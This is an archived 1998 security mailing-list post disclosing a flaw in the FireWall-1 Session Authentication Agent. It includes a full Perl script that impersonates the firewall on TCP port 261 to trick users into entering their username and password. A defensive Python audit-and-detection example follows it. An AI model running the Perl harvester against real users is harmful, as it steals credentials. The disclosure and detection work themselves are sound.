On Fri, 25 Sep 1998, Brooke Paul wrote:

> > -----Original Message-----
> > From: Larry Pingree [SMTP:larryp@secure-it.net]
> >
> > A problem exists in the Firewall-1 3.0b Session Agent
> >
> > All communications from the Firewall-1 Module to the session agent are
> > non-encrypted. Thus also allowing these communications to be snooped for
> > usernames and passwords.
>
> I think it's worth noting that Checkpoint states that the included
> Session Agent is a 'demo' and not officially supported. The real problem
> is the protocol they have defined. Even if you attempt to write a secure
> version it wouldn't interoperate with the firewall.

Where is that stated? I was unable to find any documentation stating that
the Authentication Agent is a demo. I'd be surprised if they advertised
Session Auth as a feature yet claimed that their Agent wasn't supported...

Here's the script that Larry referred to. I whipped it up during his FW-1
class, of all places... :)

---------- SNIP ----------

#!/usr/bin/perl -w
#
# This script connects to a FireWall-1 Session Authentication Agent
# running on Windows 95/NT.  It attempts to "authenticate" the remote
# user and returns the resulting username/password.
#
# The agent supports configuration of up to three IP addresses which
# are allowed to submit authentication requests.  If there are three
# addresses configured, the user is presented with the following when
# an unknown host connects:
#
#     "Authentication request from this IP Address is not allowed."
#     [ OK ]
#
# If there are only one or two addresses allowed, the user gets this
# nice little dialog box:
#
#     "Do you want to enter this IP to the Firewall-1 list"
#     [ YES ] (default)    [ NO ]
#
# Guess which button your typical user will click on?
#
# If the agent closes the connection prematurely, you will get strange
# results.
#
# tested vs. FW-1 Authentication Agent 1.1
#
# Andrew Danforth <acdat_private>

require 5.000;
use Socket;
use Getopt::Std;

$| = 1;

$FIREWALL_NAME   = "Corporate Firewall";
$PASSWORD_PROMPT = "FireWall-1 password";
$PORT            = 261;

die unless getopts('n:p:');

unless ($TARGET_IP = shift) {
    print "usage: $0 [-n firewall_name] [-p password_prompt] target_ip\n";
    exit(1);
}

$FIREWALL_NAME   = $opt_n if (defined $opt_n);
$PASSWORD_PROMPT = $opt_p if (defined $opt_p);

socket(SOCK, AF_INET, SOCK_STREAM, getprotobyname('tcp')) || die "socket: $!";
connect(SOCK, sockaddr_in($PORT, inet_aton($TARGET_IP))) || die "connect: $!";

# unbuffer the socket handle, then go back to STDOUT
select(SOCK); $| = 1; select(STDOUT);

print SOCK "220 FW-1 Session Authentication Request from $FIREWALL_NAME\n\r";
print "sent greeting\n";

print SOCK "331 User:\n\r";
print "sent user request\n";
$username = &get_response;
print "username entered: $username\n";

print SOCK "331 *$PASSWORD_PROMPT:\n\r";
$password = &get_response;
print "password entered: $password\n";

print SOCK "200 User $username authenticated by FireWall-1 authentication.\n\r";
print SOCK "230 OK\n\r";

sub get_response {
    # this is ugly but it works.  the session agent doesn't seem to send
    # proper newlines, so read byte by byte until a NUL (or EOF).
    my $input;
    $input .= $key while ($key = getc SOCK and ord($key));
    return $input;
}
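The script's comments describe two things a defender can act on: the agent only ever checks the source address of whoever connects to its port (TCP 261 in the script), and it only refuses unknown sources outright when all three allowed-address slots are filled; otherwise the user is shown an add-this-IP prompt that defaults to YES. The following is an added, defender-side example written for this page; it is not code from the thread or from Check Point. It audits an agent's configured address list against the three-slot limit and scans connection records for sessions to the agent port that did not come from an authorized firewall module. The log line format, the addresses and the timestamps are constructed for the example; only the port number and the three-slot limit come from the script above.

```python
"""Detection and configuration checks for the FireWall-1 Session
Authentication Agent behaviour described in the thread.

Assumptions (not from the page): the connection log format parsed by
parse_flow() is constructed for this example, as are all addresses.
"""
import ipaddress
import re
from dataclasses import dataclass

SESSION_AUTH_PORT = 261        # agent listening port, from the script ($PORT)
AGENT_ALLOWLIST_SLOTS = 3      # max allowed source addresses, from the comments

# Constructed log format: "<ts> <proto> <src>:<sport> -> <dst>:<dport> [flags]"
FLOW_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<proto>tcp|udp)\s+"
    r"(?P<src>[\d.]+):(?P<sport>\d+)\s*->\s*"
    r"(?P<dst>[\d.]+):(?P<dport>\d+)"
)


@dataclass(frozen=True)
class Flow:
    ts: str
    proto: str
    src: ipaddress.IPv4Address
    sport: int
    dst: ipaddress.IPv4Address
    dport: int


def parse_flow(line):
    """Parse one constructed-format log line; return None if it does not match."""
    m = FLOW_RE.match(line.strip())
    if not m:
        return None
    return Flow(m["ts"], m["proto"],
                ipaddress.IPv4Address(m["src"]), int(m["sport"]),
                ipaddress.IPv4Address(m["dst"]), int(m["dport"]))


def audit_agent_allowlist(allowed):
    """Findings for an agent's configured source list.

    With fewer than three entries the agent does not refuse an unknown
    source; it asks the user whether to add it, defaulting to YES.
    """
    findings = []
    if len(allowed) == 0:
        findings.append("no addresses configured: every unknown source is "
                        "offered the add-IP prompt")
    elif len(allowed) < AGENT_ALLOWLIST_SLOTS:
        findings.append(f"only {len(allowed)} of {AGENT_ALLOWLIST_SLOTS} slots "
                        "used: unknown sources get an add-IP prompt defaulting "
                        "to YES; fill the remaining slots")
    return findings


def find_rogue_auth_requests(lines, authorized_modules):
    """Return TCP flows to the agent port whose source is not a known module.

    The protocol is plaintext and unauthenticated, so the source address is
    the only signal available to the agent, and the same is true for a
    network monitor watching it.
    """
    authorized = {ipaddress.IPv4Address(a) for a in authorized_modules}
    hits = []
    for line in lines:
        f = parse_flow(line)
        if f is None or f.proto != "tcp" or f.dport != SESSION_AUTH_PORT:
            continue
        if f.src not in authorized:
            hits.append(f)
    return hits


# Constructed sample records: 10.0.0.1 plays the real firewall module,
# 10.0.5.77 a workstation on the same LAN talking to two agents.
SAMPLE_LOG = [
    "1998-09-25T10:00:00 tcp 10.0.0.1:40001 -> 10.0.5.20:261 SYN",
    "1998-09-25T10:00:05 tcp 10.0.5.77:51234 -> 10.0.5.20:261 SYN",
    "1998-09-25T10:00:07 tcp 10.0.5.77:51235 -> 10.0.5.21:261 SYN",
    "1998-09-25T10:00:09 udp 10.0.5.77:5000 -> 10.0.5.20:261",
    "1998-09-25T10:00:10 tcp 10.0.5.77:51236 -> 10.0.5.20:80 SYN",
    "not a flow record",
]

if __name__ == "__main__":
    for finding in audit_agent_allowlist(["10.0.0.1"]):
        print("config:", finding)
    for f in find_rogue_auth_requests(SAMPLE_LOG, ["10.0.0.1"]):
        print(f"alert: {f.ts} unauthorized session-auth request "
              f"{f.src}:{f.sport} -> {f.dst}:{f.dport}")
```

Run against the constructed sample with only 10.0.0.1 authorized, the scan reports the two TCP/261 sessions from 10.0.5.77 and ignores the UDP record, the port-80 record and the unparseable line; the allow-list audit flags the single-entry configuration because two empty slots remain.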
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:17:45 PDT